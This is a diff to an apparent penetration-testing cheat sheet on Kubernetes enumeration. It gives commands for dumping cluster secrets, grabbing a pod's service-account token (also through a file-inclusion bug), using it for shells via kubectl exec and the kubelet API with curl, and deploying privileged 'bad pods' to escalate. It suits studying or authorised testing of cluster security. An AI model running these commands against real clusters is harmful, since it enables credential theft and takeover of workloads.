Kubernetes

Enumeration/Kubernetes.md

@@ -1,68 +1,79 @@
 ## Kubernetes Enumeration
 
+Levels of abstraction in a Kubernetes setup are high and challenging to maintain even if you get paid to work on the cluster.
+Challenging part of enumerating a unknown Kubernetes cluster is the potential amount of possible different kinds and types of configurations.  
+Ideally, Kubernetes enumeration results in a (high privilege) token or ideally in credentials as secrets in the cluster.
+
 ## Kubectl
 
-* Get pods, `-A` for all namespaces
+You should check for all kinds and types of configuration items in the namespaces you got permissions for.
+Starting with a check of what you are permitted to list
+```sh
+kubectl auth can-i --list
+```
+
+Follow up with a listing and description of all pods, `-A` to list all namespaces.
 ```sh
 kubectl get pods -A 
 ```
-* Check mounted secret
+Check if you can output mounted secret
 ```sh
-kubectl auth can-i --list
+kubectl get services
 kubectl get secrets
 kubectl get nodes
 kubectl get deployments
-kubectl get services
 kubectl get ingress
 kubectl get jobs
 ```
 * Intel about a secret, and output
 ```sh
-kubectl describe secrets <secret> 
+kubectl describe secrets <secret>  -o yaml
 kubectl get secret <secret> -o json
 kubectl describe secrets <secret> -o 'json'
 ```
 ### Abuse Token
+
 * Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token` 
-* By change of an LFI extract the token and 
+By any chance of an LFI extract the token and take a look on what you are permitted to list and describe using it.
 ```sh
 kubectl auth can-i --list --token=$TOKEN
 kubectl get pods  --token=$TOKEN
 kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
 ```
 
-* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
+* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just store it in the following way and spare the pain for another day__
 ```
 TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
 ```
 
 #### Elevate Permissions with found token
 
-* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
+If a token has been found but its permissions on other containers can not be used through kubectl directly, try to use curl as well via the following line
 ```sh
 curl  -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
-``` 
+```
-    * Find namespace and pods
+
+To create the URL you wnat to query, find namespace and pods
 ```sh
 kubectl get pods -A
 ```
-    * Find name of container inside the pod description under `ContainerStatuses/name`
+Next, take a look at the  name of container inside the pod description under `ContainerStatuses/name`
 ```sh
 kubectl get pod $POD -n $NAMESPACE -o yaml
 ```
 
-* Interesting find in any high priv container are 
+Interesting find in any high priv container are 
 ```sh
 /run/secrets/kubernetes.io/serviceaccount/token
 /run/secrets/kubernetes.io/serviceaccount/ca.crt
 ```
 
-* Enumerate again with the new found token
+Enumerate again with the new found token
 ```sh
 kubectl auth can-i --list
 ```
 
-### Create Pods
+### Create Malicious Pods
 
 * Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
 * If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
@@ -74,17 +85,18 @@ kubectl apply -f pod.yml --token=$TOKEN
 kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
 ```
 
-### Start Pods
+#### Start Pods
-
 ```sh
 kubectl exec -it  <podname> -n <namespace> -- /bin/bash
 ```
 
-## Microk8s
+## Tools
+
+### Microk8s
 
 * [microk8s repo](https://github.com/ubuntu/microk8s)
 
-### Enumeration
+### Enumeration of Microk8s
 
 ```sh
 microk8s kubectl get nodes